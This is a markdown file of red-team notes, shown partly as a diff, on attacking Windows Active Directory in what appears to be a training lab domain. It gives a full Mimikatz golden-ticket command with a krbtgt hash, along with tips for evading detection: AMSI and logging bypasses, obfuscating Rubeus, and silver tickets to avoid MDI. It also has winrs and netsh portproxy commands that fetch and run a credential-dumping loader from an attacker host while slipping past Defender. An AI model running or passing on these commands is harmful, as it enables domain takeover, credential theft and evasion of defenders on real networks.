0xIapetus/RedTeamingNotes/All_About_Windows.md

 ## Also, if we have NTLM hash of a DC, we can extract NTLM hashes of any machine account using netsync
 ## If we forge a Golden Ticket with SID History of the Domain Controllers group and Enterprise Domain Controllers Group, there are less chances of detection by ATA:
 `Invoke-Mimikatz -Command '"kerberos::golden /user:dcorp-dc$ /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'`

+# Evade powershell logging and AMSI bypass (https://github.com/OmerYa/Invisi-Shell)
+-> Patches AMSI
+-> System wide transcription
+-> Script block logging

+### Obfuscation
+For Rubeus.exe, use ConfuserEx (https://github.com/mkaring/ConfuserEx) to obfuscate the binary.

+## Notes
+### General way 2: of opsec.
+# When an admin is running as a service on a machine we can extract clear text pass with sekurlsa::ekeyes.

+### Thinks to remember 3: opsec
+If our target is 2016 and before then after using a golden ticket or a silver ticket we cant use winrs or powershell remoting however u can still run commands using wmi (`gwmi -C win32_computersystem -ComputerName dcorp-dc`).
+If its 2019 ++ you have no problem.

+### Thinks to remember 4: opsec
+Using silver ticket might be fancy becuase Miscrosoft MDI doesnt care about silver tickets and in some cases we dont touch the DC but our persistence period by default is 30 days for computer accounts.
+Also have in mind that if we want to do multiple things even when targeting a DC(not recommended) we have to create different tickets for different purposes(ex: HOST to create a schtask)

+### Thinks to remember 5: opsec
+If you try to create a silver ticket and use /service:HTTP in order to use winrm it wont work if its 2016.

+###  Thinks to remember 6: opsec
+When you get access to a new user it is worth checking if he/she has local admin access to any other machine

+### Thinks to remember 7: opsec
+In cases you run sekurlsa::ekeys and if you find many aes keys for the same user check the SID always, and for example in case of a resource based constrained delegated scenario would pick S-1-5-18 which is the admin one !

+### Thinks to remember 8: opsec
+Use silver tickets for staying under the radar dont do stupidities like adding ur account to domain admin group with that, be smart.

+### Thinks to remember 9: opsec
+Kerboroasting on the best attacks for staying under the radar, if you manage to guess the pass(I mean its RC4 ... hope you do it !)

+### Thinks to remember 10: opsec
+ACL attacks are interesting and very profitable, i would also say that there are stealthier than others.

+## Thinks to remember 11: opsec
+Credential theft protections(Credential Guard,Protected users group) are not protecting against extracting credential from the registry, only from lsass.
+Credentials for local accounts in SAM and Service account credentials from LSA Secrets are NOT protected.

+## Things to remember 12: When looking for domain admins you should always check the SID if the last three digits are 500, because someone might have renamed him.
+On the other hand on a non-domain machine when you are not local admin, you cant find that if they are renamed.

+### Behavioural bypassing
+## Scenario 1: We have remote access to another machine and we want to use a binary to download something and execute it in the memory.
+An executable trying to download another executable or something from a remote server will trigger bevaviour base detection from defender.
+Instead portforward your own port and download it from 127.0.0.1 which will not be a remote server.
+**Example:**
+`winrs -r;dcorp-mgmt hostname:whoami` -> "From our machine exec on the other machine" `iwr http://172.16.100.1/Loader.exe -OutFile C:\Users\Public\Loader.exe` "Download on our machine" `echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe` "Copy on the rmt machine" `winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://172.16.100.1/Loader.exe sekurlsa::ekeys exit` "Wrong way as executable tries to download another executable and run it from 'remote server'"
+`winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=127.16.100.1`"Correct way as we forward our port as the remote machine localhost port access, so it seems that the remote machine is downloading from itself and not from a remote server"
+############################################################################
+### Noisy commands that and should be avoided :
+## Scenario 2: In general the idea is when you ask something from the DC and you spam all the machines in the network you will leave logs on all the machines and you will cause a network spike.